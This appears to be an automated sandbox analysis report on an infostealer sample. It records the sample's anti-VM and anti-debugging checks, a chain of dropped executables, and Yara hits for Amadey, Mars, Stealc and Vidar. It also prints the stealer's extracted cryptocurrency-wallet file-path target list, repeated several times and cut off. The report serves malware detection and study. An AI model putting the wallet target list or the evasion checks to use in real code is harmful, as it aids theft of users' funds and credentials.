Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.8.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.8.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.8.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: KJEBKJDA.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: KJEBKJDA.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: KJEBKJDA.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.8.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: KJEBKJDA.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: KJEBKJDA.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2623849094.000000000166F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWA
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Code function: 10_2_04CD0ADC rdtsc 10_2_04CD0ADC
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CA15FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6CA15FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C9B3480
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009E643B mov eax, dword ptr fs:[00000030h] 14_2_009E643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009EA1A2 mov eax, dword ptr fs:[00000030h] 14_2_009EA1A2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9EB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C9EB66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9EB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C9EB1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GDHIIIIEHC.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe "C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe "C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe" Jump to behavior
Source: explorti.exe, explorti.exe, 0000000D.00000002.2719044484.0000000000BAB000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: 3iProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9EB341 cpuid 0_2_6C9EB341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\7873c16243.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9B35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C9B35A0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 14_2_009B6590 LookupAccountNameA, 14_2_009B6590
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.8.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.8.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 12.2.explorti.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.explorti.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explorti.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.BAFIEGIECG.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000003.2668322526.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2760972491.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2677594002.00000000003F1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2678309307.0000000004890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2718941030.00000000009B1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3412646742.00000000009B1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2708594114.00000000009B1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2636976626.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.7873c16243.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2838460669.0000000000DB1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2623849094.0000000001605000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7873c16243.exe PID: 6984, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.file.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.7873c16243.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2838460669.0000000000DB1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2622413487.0000000000361000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4368, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2623849094.00000000015E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda 